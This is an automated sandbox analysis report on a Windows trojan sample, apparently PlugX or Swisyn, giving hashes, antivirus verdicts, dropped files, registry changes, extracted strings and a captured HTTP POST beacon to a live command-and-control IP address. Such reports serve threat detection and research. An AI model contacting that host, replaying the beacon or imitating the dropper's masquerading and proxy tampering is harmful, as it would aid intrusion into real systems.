Analysis Date: 2014-07-27 19:36:05
MD5: 810f2d6eccccc5f034f0ee91743c1608
SHA1: 91d34316c33828dd32890f42e586ad24e2e161aa

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: dc1452578c65dcaac780bbdbb897ca15 sha1: 99fa24e38c5b02a471e8e168b8fe7c3a5b528de1 size: 8192
Section .rdata md5: 0feb160c06aa7eaa1f220c8b5d68da02 sha1: 64756d7607af5603ae7685fa7d260eac086602e1 size: 8192
Section .data md5: 955be592113e5f297d40e5afe816d00d sha1: 745a8f6e8fe9f502cf7441b2f30f7034eb584055 size: 4096
Section .rsrc md5: 05983abc1fb5280127ecec76c8cae775 sha1: c91abaf2c7cad9b7c383b56ad29aefbaeedc6b33 size: 86016
Timestamp: 2014-06-23 09:52:15
Version: LegalCopyright: Copyright (C) 2014
InternalName:
FileVersion: 6.1.7600.16385
CompanyName: Microsoft Corporation. All rights reserved.
PrivateBuild:
LegalTrademarks:
Comments:
ProductName:
SpecialBuild:
ProductVersion: 6, 1, 7600, 16385
FileDescription:
OriginalFilename:
Packer: Microsoft Visual C++ v6.0
PEhash: 64ca865e23f947b865ff44c5f96a678fe33c8304
IMPhash: e769a4099e1d31353febd2a2ce6b58d5
AV 360 Safe: Trojan.Agent.BDSU
AV Ad-Aware: Trojan.Agent.BDSU
AV Alwil (avast): no_virus
AV Arcabit (arcavir): no_virus
AV Authentium: no_virus
AV Avira (antivir): TR/Agent.BDSU
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV Emsisoft: no_virus
AV Eset (nod32): no_virus
AV Fortinet: W32/Swisyn.DGDX!tr
AV Frisk (f-prot): no_virus
AV F-Secure: Trojan.Agent.BDSU
AV Grisoft (avg): Win32/DH{gRKBE0EDYXluHiATFBdmIiM}
AV Ikarus: no_virus
AV K7: no_virus
AV Kaspersky: Trojan.Win32.Swisyn.dgdx
AV MalwareBytes: no_virus
AV Mcafee: no_virus
AV Microsoft Security Essentials: Backdoor:Win32/Plugx.A
AV MicroWorld (escan): Trojan.Agent.BDSU
AV Norman: winpe/Agent.BEEXO
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): BScope.Trojan.SvcHorse.01643

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Rundll32.exe
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\3509_appcompat.txt
Creates Process: C:\WINDOWS\system32\drwtsn32 -p 1216 -e 148 -g
Creates Process: C:\WINDOWS\system32\dwwin.exe -x -s 192
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\Rundll32.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Rundll32.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\CLASSES\FAST\CLSID ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: Fast
Winsock DNS: 103.226.127.119

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 192

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 1216 -e 148 -g

Network Details:

HTTP POST: http://103.226.127.119/update?id=00430d48
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1)
Flows TCP: 192.168.1.1:1031 ➝ 103.226.127.119:80
Flows TCP: 192.168.1.1:1031 ➝ 103.226.127.119:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7570 64617465 3f69643d   POST /update?id=
0x00000010 (00016)   30303433 30643438 20485454 502f312e   00430d48 HTTP/1.
0x00000020 (00032)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000030 (00048)   582d5365 7373696f 6e3a2030 0d0a582d   X-Session: 0..X-
0x00000040 (00064)   53746174 75733a20 300d0a58 2d53697a   Status: 0..X-Siz
0x00000050 (00080)   653a2036 31343536 0d0a582d 536e3a20   e: 61456..X-Sn: 
0x00000060 (00096)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000070 (00112)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000080 (00128)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000090 (00144)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x000000a0 (00160)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000b0 (00176)   30373237 3b205356 31290d0a 486f7374   0727; SV1)..Host
0x000000c0 (00192)   3a203130 332e3232 362e3132 372e3131   : 103.226.127.11
0x000000d0 (00208)   390d0a43 6f6e7465 6e742d4c 656e6774   9..Content-Lengt
0x000000e0 (00224)   683a2030 0d0a436f 6e6e6563 74696f6e   h: 0..Connection
0x000000f0 (00240)   3a204b65 65702d41 6c697665 0d0a4361   : Keep-Alive..Ca
0x00000100 (00256)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000110 (00272)   63616368 650d0a0d 0a                  cache....


Strings
.
.
.

040904b0
6, 1, 7600, 16385
6.1.7600.16385
&About Fast...
About Fast
Cancel
Comments
CompanyName
Copyright (C) 2014
Fast
Fast Version 1.0
FileDescription
FileVersion
InternalName
@jjh
LegalCopyright
LegalTrademarks
Microsoft Corporation. All rights reserved.
MS Sans Serif
OriginalFilename
PrivateBuild
ProductName
ProductVersion
SpecialBuild
StringFileInfo
TODO: Place dialog controls here.
Translation
VarFileInfo
VS_VERSION_INFO
0aLhg~T
)1\13$
1MRphd<'
1Z\EG_g[
2_8u?jjN
2 vnK'
2(yDO9
5^J{tV
6689im
\6DFq/OU
6p|9Y@
;!72s.~
7g~5e#
7|l~f80R
8XU`8k
>9@%}^
:a'2(o
_acmdln
_adjust_fdiv
ADVAPI32.dll
-A	*H^V
aI@m=,(>
#AJnf#u
a:.#O,
AppendMenuA
Ar^/.{B$
a+tnTf
aZ.(vC
b2DkZ	
BaI{pR`j
bCl#Bl
bpT/0/
]btJQ%a
`~b,'zTA
cn{FqE
,cng;r
_controlfp
CopyFileA
CopyIcon
.'cqBAA
CreateFontIndirectA
CreateMutexA
CreateProcessA
]CvF_j@
__CxxFrameHandler
@.data
De`5&Vk
DestroyCursor
d$H?H~
__dllonexit
DrawIcon
E_>39/tDK
 ,e7l 
E`g;dW'
=~Egq(
EnableWindow
_except_handler3
EX-_RP@
FindResourceA
FreeLibrary
FZO(/	k
GDI32.dll
GetClientRect
GetCurrentThreadId
GetCursorPos
GetInputState
GetLastError
__getmainargs
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetObjectA
GetParent
GetProcAddress
GetStartupInfoA
GetStockObject
GetSystemMenu
GetSystemMetrics
GetTempPathA
GetTextExtentPoint32A
GetWindowRect
GetWindowsDirectoryA
[GLRZd
G\YBYD1N
GYn{UsS
) h4>nK
hB *H7u?
>[HwU\
I]8<-_i
Ik?gEL[
InflateRect
_initterm
InvalidateRect
IsIconic
IsWindow
IZ /I-
{J2L<c
J  6h_+;
JjU+Ic<?&
k8/a"=]`n
<#~KBZ
kCNj[d$)
\K+)EKt
Kernel32.dll
KERNEL32.dll
KillTimer
K$z~6p
l'2c1o<
@L	4X-
L$`_^][d
Lg`CfplRe
l{/m/,
=lm2P6
Lmz@}]
LoadCursorA
LoadIconA
LoadLibraryA
LoadResource
LockResource
LoTT,t
L$$Qj<R
|lr?7EG=n
lstrcatA
lstrcpyA
lstrlenA
lX4/N1
$M&/BpAg
_mbsstr
MFC42.DLL
mNc}[}3=
m~nq	rRa
*MO?Fg
MSVCRT.dll
N[}#3FR
ns{FGF
nUg	$)Y
)ny{'Q 
N^ZfE(A
o	B6Jfd
+`o^k8V
[OliNEC
_onexit
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
__p__commode
__p__fmode
pMKPuz
pN0o/'
PostThreadMessageA
PtInRect
QRSSSSS
-qSt5Z
QS	\]Vv
qtcdm:
QWFHG$1
=rCN	}D
`.rdata
RedrawWindow
RegCloseKey
RegOpenKeyExA
RegQueryValueA
ReleaseDC
^RichH
Rundll32.exe
@sc.4N@)
sD@KyI
SendMessageA
__set_app_type
SetCursor
_setmbcp
SetTimer
__setusermatherr
SetWindowLongA
SHELL32.dll
ShellExecuteA
\shell\open\command
SizeofResource
,S;-)jI
S"%->>K
?SKlt	
S}m",QI
sR3["Q
_stricmp
T)0Ez5
!This program cannot be run in DOS mode.
u$E3H/
~uJ	"mZ%-
u-N_%q
uPA8"z
USER32.dll
,$u%Ua`Ny
 v5CVV[
vfQYm=
VirtualAlloc
Vi W!^R
,v@l=A
v(,rh+qp
~VsrlX
W-3F,1
W{am*p?
WinExec
\winhlp32.exe
W{[+.m
+wn@{*
wnt_2|&
/],'>X
x4##j0
X@8JX;
xCJDW]
_XcptFilter
XE&|SS/~
%x;G	13
XW_7?<
]yd]jG
.y)JL+t
Z3zD0=
zoxQ'.
Z]PG>C94
ZQdl\4
Zu~2|h6